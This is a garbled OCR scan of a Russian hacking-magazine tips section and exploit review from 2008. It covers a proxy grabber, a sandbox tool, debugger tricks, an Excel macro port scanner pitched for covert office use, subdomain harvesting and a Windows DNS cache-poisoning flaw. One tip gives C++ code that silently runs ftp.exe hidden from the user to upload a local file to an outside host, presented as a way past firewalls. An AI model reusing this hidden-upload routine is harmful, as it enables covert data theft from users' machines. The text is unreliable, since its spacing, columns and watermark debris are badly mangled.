2.Товарищ_3lfзаботливонаписалхтмл-формудляудобнойзаливкифай- ловслинкаминапрокси-листы(лежитвместесоскриптомнанашемDVD).

3.Заливаемграббернасервер,указываемфайлслинкаминапрокси-лис- ты(напарсишьвГуглебезособыхпроблем)ижмем«Start».Файлдолжен иметьвид:

http://www.site.com/list1.html

http://www.site.com/list2.html

http://www.site.com/list3.html

http://www.site2.com/list1.html

http://www.site3.com/list2.html

http://www.site4.com/list3.html

4.Собственно,все.Довольствуемсярезультатом.

Скриптдостаточношустрый,однакотывполнеможешьзамутитьмногопоточность,переписавегонаперле.Вобщем,какдобыватьпроксики

—решатьтебе:).

4

Задача:НаписатьпростойloaderнаС++ Решение:

Заливать файл на сервер будем по ftp при помощи стандартной виндовой утилы ftp.exe. Процесс автоматизируем небольшой прогой на С++. Одно из преимуществ этого метода — обход криво настроенных файрволов, так как у большинства незадачливых владельцев «огнестенок» командная строка (через которую, собственно, и работает майкрософтовский фтп-клиент) находится в списке доверенных приложений. Вооружившись компилятором, приступим к решению.

1.Призапускеftp.exeпрограмменеобходимопередатьдвапараметра:путьдо файласкомандамииимя(либоIP)хоста.Допустим,наиболеебезопаснымместомдлясозданияфайлабудетвиндоваядиректория.Забросимвпеременную com_fileпутьвидаX:\WINDOWS\ftp_commands:

char com_file[256]; char m_dir[256];

GetWindowsDirectory(m_dir,sizeof(m_dir)); strcpy(com_file, m_dir); strcat(com_file,"\\ftp_commands");

Здесьвсепредельнопонятно,стоитлишьобратитьвниманиенадвойной бэкслеш(\\)вместоодинарного.Егонужноиспользоватьвезде,гденеобходимо

показатьвложенностьдиректорий.Завершимсозданиепеременнойспараметрами,используяcom_file:

char param[128]; strcpy(param, "-s:"); strcat(param, com_file); strcat(param, " "); strcat(param, "my-host.com");

Врезультатевпеременнойparamполучим:«-s:X:\WINDOWS\ftp_ commands my-host.com».

2.Начинаемобщениессервером.Путьдофайласкомандамиопределили,ас самимфайломнепоработали.Исправимэто:запишемвнегопоследователь- ностькоманд,передаваемыхftp-шнику.

Великийимогучий

xàêåð 05 /113/ 08

045

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ofstream of(com_file); of<<"mylogin"<<endl; of<<"mypass"<<endl; of<<"cd WWW"<<endl; of<<"send " << "D:\\WINDOWS\\regedit.exe" << " " << "regedit.exe" << endl; of<<"quit"; of.close();

Передаемлогинипароль.Строчкой«cd<имя_папки>»меняемдиректорию (еслитребуется).Командойsend(send <локальный_файл> <файл_на_ сервере>)будетпосланэкзешниксредакторомреестра.Нуастрочкой «quit»попрощаемсясфтп-шникомсервера.

3.ВоспользуемсяфункциейShellExecute() длязапускаftp.exe.Третьим параметромпокажемнамерениезапуститьвиндовыйфтп-клиент,ачетвертым передадимподготовленнуюстрокуспараметрамидлянего.Чтобынебеспо- коитьпользователя,укажемSW_HIDE—иконсольныйзапускftp.exeпройдет незаметно.Набираем:

ShellExecute(0 ,NULL, "ftp", param, NULL, SW_HIDE);

Готово.Компилируем,запускаем,проверяемftp-сервер.

5

Задача: Создать плацдарм для экспериментов на рабочей Винде Решение:

Отбросим в сторону скучные виртуальные машины, создание «слепков», копий системы и использование соседского компьютера для тестов необычного софта. Есть более дешевый в плане времени и сил способ.

1.Работать будем все с той же осью, приветственный экран которой видим каждый день. Могу уверить, что все нижеописанное испробовал лично и ничего с твоими форточками не случится. Итак, ставим почти бесплатную прогу ShadowUser Pro. Принцип работы основан на том, что «слепок» системы не создается, а ведется четкая история ее изменений (что экономит место на винте).

2.Выбираем Configuration на панели слева. Первая вкладка (Volumes) предоставляет нам список дисков, за изменениями которых будем следить. При тестах утил, которым мы не доверяем или не имеем понятия об их направленности, лучше перестраховаться и выбрать All Volumes. В противном случае какой-нибудь трой вольготно устроится на незащищенном носителе и продолжит свое существование после перезагрузки.

3.Следующая вкладка (Exclusion List) позволяет создавать список папок, изменения в которых отменяться не будут. В папки будем складывать результаты работы (логи, конфиги — все, что угодно), которые останутся нетронутыми при возврате к первоначальному состоянию системы. Минимальная подготовка закончена, приступим к тестам.

4.Режим, в котором можно свободно экспериментировать, называется «ShadowMode». Он запускается щелчком по кнопке Mode и выбором Activate. Действовать режим начнет только после перезагрузки, о чем будет выведено предупреждение. Перезагружаемся. Сразу заметны

Типичныйцикл

яркие обои, оповещающие о включенном ShadowMode (настраивается через Options Wallpaper). С этого момента можно выполнять любые действия. Вот что было опробовано мною:

— копирование/удаление/изменение файлов; — инсталляция и деинсталляция программ; — добавление/удаление разделов и значений реестра; — изменение параметров автозагрузки в msconfig; — изменение параметров запуска и работы сервисов; — изменение сетевых настроек; — смена стиля Винды, обоев и скрытие панели задач;

— запуск практически безобидного троянчика

Наигрался? Пора возвращать все на свои места. Находим в трее

ShadowUser и отключаем режим ShadowMode, выбрав Lose_All_ Changes и приняв предложение перезагрузиться. После перезагрузки видим отсутствие любых изменений, внесенных при работе в

ShadowMode. Удобно? И не говори :).

ShadowUserPro

6

Задача: Избежать многократного выполнения цикла при пошаговой отладке процесса Решение:

Всем известно, что практически любая программа использует циклы в очень большом количестве. Они могут быть сгенерированы при компиляции даже там, где, казалось бы, их быть не должно. Очень утомляет, когда при пошаговой отладке в OllyDbg (по нажатию клавиши <F7> или <F8>) программа крутит цикл десятки и сотни раз. Наблюдать за этим нет никакого смысла, если только во время выполнения не генерируется какое-либо значение. Как избежать «зацикливания» при пошаговой отладке? Ответ проще, чем ты думаешь. Конструкция цикла обычно выглядит следующим образом:

046

xàêåð 05 /113/ 08

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

>> взломto BUY

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

 

 

 

 

.c

 

 

 

p

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

CMP регистр1, регистр2; сравнение двух значений [Оператор_условного_перехода] адрес; условный переход на указанный адрес

Оператор условного перехода является одной из инструкций: je, jle, jz, jnz. Все они проверяют состояние регистра флагов, биты которого принимают то или иное значение в зависимости от результата выполненной операции (чаще всего — операции сравнения — «CMP»). Как правило, адрес, на который указывает инструкция условного перехода в случае цикла, меньше

адреса, по которому располагается сам переход (то есть, меньше содержимого регистра EIP на момент выполнения инструкции перехода).

Можно сделать простой вывод — цикл должен быть выполнен не пошагово, а в режиме исполнения программы. После чего необходимо приостановить ее.

1.Поставить точку останова на инструкцию, следующую сразу после операции условного перехода (<F2> в OllyDbg).

2.Запустить программу на исполнение (<F9>).

3.После остановки программы на брейкпоинте продолжить ее выполнение в пошаговом режиме (<F7> или <F8>).

7

Задача: Просканировать порты удаленной машины с помощью Excel

Решение:

Представь,чтотывстрогомофисе,гдемаловозможностейдляхакер- скихшалостей.Нотребуетсяпошалить,аименно—автоматизировано просканироватьпортыудаленноймашины,находясьвусловияхзамкнутой (изолированной)программнойсреды,вкоторойзапрещеноиспользование стороннегософта(внашемслучае,сканеровпортов).

Прибегаякдействиямпоограничениюсвободыработников,администраторрискуетстолкнутьсясчеловеческимфактором:«чембольшепытаются эшелонироватьзащитуиснизитьрискатаквкругусвоихколлег,тембольше интересаидействийсихстороныпоследует».

Вкачествевариантарешенияпредлагаетсявоспользоватьсяпростым средством,доступнымкаждому—MicrosoftExcel.

1.СоздадимпроизвольныйфайлExcel.Теперьсделаеммаленькуюразметку иприступимкпрограммированию,аименнонаписаниюзлогоVBA-мак- роса.Макроспрост—втаблицеобозначимполядлядиапазонапортови, собственно,хоста.

2.Переходимвменю«СервисМакросМакросы»ижмемнакнопку

«Создать»,предварительноназвавмакроспрямымименем«PortScan».

3.Воткрывшемсяокнередакторавобьеммойвариантмакроса(ищина DVD).Сутьмакросапойметдажеребенок—идетобозначениепеременных (втомчисле,сетевых),присвоениеимзначенийячеек,азатем,собственно, сканированиекаждогопортаи...завершениеработынашегочудо-сканера.

4.Наслаждайсяжизньюипомни,чтоэтотсканерможноприжеланиии наличиипрямыхрукпревратитьвполноценныйэксплойт.Иникакойадминистраторнедогадается.

Релизмоегопортсканератытакжеможешьвзятьснашегосайта(xakep. ru/post/22983/default.asp).

Заготовкадляпроведениязлогосканирования

Результатполучен—мывыявилиFTP-сервер:)

8

Задача: Собрать с одного хоста все поддомены Решение:

Воспользоваться услугами domainsdb и прочими ресурсами — вариант известный. Я же предлагаю принципиально новый, а главное, действенный прием по разведке доступных поддоменов. В этом нам помогут Google-группы (http://groups.google.com). Дело в том, что Google индексирует сайты и их поддомены в качестве групп. Зачастую туда попадают и отличные по контенту вещи. С помощью разумного парсинга ты получишь желаемый результат. Итак, для успешной разведки тебе нужно:

1.Поставить поддержку Python на твой сервер.

2.Целиком и полностью довериться моему парсеру, который обращается к Google-группам по целевому хосту, выдирает из страниц ответа ВСЕ возможные поддомены и... предоставляет их тебе! Не жизнь, а сказка (скрипт, естественно, лежит на нашем DVD).

3.Наслаждаться моей добротой :).z

Всеподдомены,принадлежащиеодномухосту—какналадони

xàêåð 05 /113/ 08

047

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

 

 

 

 

.c

 

 

 

p

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Обзорэксплойтов

Крис Касперски

После потока интересных дыр неожиданно наступило затишье. За последнее время не обнаружено ни одной значительной уязвимости, которую можно использовать для массированных хакерских атак. Поэтому приходится довольствоваться дичью поменьше, благо, таковая имеется, а заплатки — отсутствуют. Как следствие, в Сети находится куча беззащитных рабочих станций и серверов.

 

 

Microsoft

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

щимDNS-серверамикэширующие

UK),ошибканикудаделась,идаже

>>Targets

 

 

 

 

 

 

 

 

 

Windows

 

полученныеотних(илиотхакера)

самыепоследниеверсииWindows

ВсялинейкаNT-подобныхсистем

01ошибка

ответы.Образовывалсяустойчивый

подверженыугрозеатаки.AmitKlein

поВистувключительно(32 битные

 

DNS-клиента

 

очагзаражения(poisonedDNS-

подробноописалтехникуатакив

и64 битныередакции).

 

 

 

 

 

 

server)—пользователь,например,

документе«MicrosoftWindowsDNS

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

>>Brief

 

 

 

 

пыталсяразрешитьдоменноеимя

StubResolverCachePoisoning»вме-

>>Exploit

 

 

 

 

 

 

 

 

Microsoftпродолжаетрадоватьнас

 

www.intel.com,апопадалнасервер

стесисходнымитекстамиproof-of-

Исходныетекстыexploit’аможно

 

новымиистарымидырами,перехо-

 

 

 

conceptexploit’а:http://www.trusteer.

 

 

 

 

 

 

 

 

 

 

 

 

злоумышленника,начиненный

найтивстатьеAmitKlein’а:www.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дящимиизоднойверсииWindowsв

 

зловреднымипрограммами.Когда

com/docs/Microsoft_Windows_

 

trusteer.com/docs/Microsoft_

 

другую.ПервыеатакинаDNS-прото-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

жеошибкивDNS-серверахбыли

resolver_DNS_cache_poisoning.pdf.

Windows_resolver_DNS_cache_

 

 

 

 

 

 

исправлены,хакерыпереключились

Ознакомившисьсэтимиссле-

 

poisoning.pdf.

 

 

 

 

 

 

 

наатакиDNS-клиентов,чтооказа-

дованием,одинизсотрудников

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лосьнамногосложнее,поскольку

Microsoftвыразилвсвоемблоге

>>Solution

 

 

 

 

 

 

 

типичнаяпользовательскаямашина

резкоенесогласие:blogs.technet.

Установить на рабочей станции

 

 

 

 

 

 

генерируетсравнительнонеболь-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

com/swi/archive/2008/04/09/ms08-

 

свой собственный DNS-сервер

 

 

 

 

 

 

шоеколичествоDNS-запросовв

020 how-predictable-is-the-dns-

 

(например, бесплатный SMALL

 

 

 

 

 

 

единицувремени.«Скормить»ей

transaction-id.aspx.Нуапокамежду

HTTP), напрямую обращающийся

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

поддельныйDNS-ответнетак-то

нимиидутразборки,дырапопалана

к корневым DNS-серверам по

 

 

 

 

 

 

просто.Дляэтогонеобходимознать

SecurityFocus:www.securityfocus.

TCP-протоколу, и заблокировать

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

IP-адресоригинальногоDNS-сер-

com/bid/28553/info.

53 UDP порт на брандмауэре для

 

 

 

 

 

 

вера,номерUDP-портаисточника

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

и16 битныйидентификаторTXID

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Microsoftупорноотказывается

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

признаватьналичиедыры!

 

 

 

(TransactionID).Всилувысокой

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

предсказуемостидвухпоследних

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

колбылизафиксированывдалеком

 

значенийатаканаNTнепредстав-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

1989годуисводилиськгенерации

лялабольшойпроблемы,очем

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

подложногоDNS-ответа,который,

Microsoftузналалишьвмарте2004

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

темнеменее,воспринималсяжерт-

 

года,исправивошибкувW2KSP4и

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

войкакподлинный«благодаря»

 

XPSP2.Точнее,онадумала,чтоее

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

слабостимеханизмааутентифика-

 

исправила...Согласноисследовани-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ции.ХакерыатаковалиDNS-сервера

 

ямAmitKlein(изкомпанииTrusteer),

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

провайдеровиликрупныхимелких

 

AllaBerzroutchko(компанияScanit)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

фирм,обращающиесяквышестоя-

 

иRoyArends(компанияNominet

Proof-of-conceptexploitвтекстовомредакторе

048

xàêåð 05 /113/ 08

Соседние файлы в папке журнал хакер